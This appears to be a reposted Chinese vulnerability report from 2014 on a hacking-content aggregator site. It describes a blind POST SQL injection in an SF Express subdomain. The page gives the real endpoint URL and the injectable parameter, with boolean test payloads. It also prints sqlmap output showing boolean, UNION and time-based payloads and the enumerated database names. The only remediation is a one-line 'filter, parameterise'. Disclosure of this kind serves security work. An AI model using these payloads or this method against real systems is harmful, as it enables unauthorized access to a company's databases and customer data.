记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

顺丰速运某分站注入漏洞

2014-06-10 03:10
顺丰速运某分站存在注入漏洞,盲注,post型
 
注入点:
 
http://ows-dfppe.sf-express.com/ows-dfp/$%7Bpath%7D/coverage_area!getCoverageCityList.action
 
post参数:
 
regionName=98605&level=3&lang=sc&region=us
 
其中regionName存在注入。
 
post数据:
 
regionName=98605%25' aND 1236=1236 aND '%25'='&level=3&lang=sc&region=us
 
返回正常,如图:
 
post数据:
 
regionName=98605%25' aND 1256=1236 aND '%25'='&level=3&lang=sc&region=us
 
返回异常
 

 
sqlmap跑库:
 

sqlmap identified the following injection points with a total of 38 HTTP(s) requests:

---

Place: POST

Parameter: regionName

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: regionName=98605%' AND 2644=2644 AND '%'='&level=3&lang=sc&region=us



Type: UNION query

Title: MySQL UNION query (NULL) - 2 columns

Payload: regionName=98605%' UNION ALL SELECT NULL,CONCAT(0x7174797371,0x44644d4352736b48514e,0x716c697871)#&level=3&lang=sc&region=us



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: regionName=98605%' AND SLEEP(5) AND '%'='&level=3&lang=sc&region=us

---

[12:56:43] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL 5.0.11

[12:56:43] [INFO] fetching database names

available databases [4]:

[*] information_schema

[*] mysql

[*] opencms

[*] test



[12:56:43] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 21 times

[12:56:43] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/ows-dfppe.sf-express.com'

 

 
 
 
修复方案:
过滤,参数化
知识来源: www.2cto.com/Article/201406/307565.html

阅读:214520 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“顺丰速运某分站注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词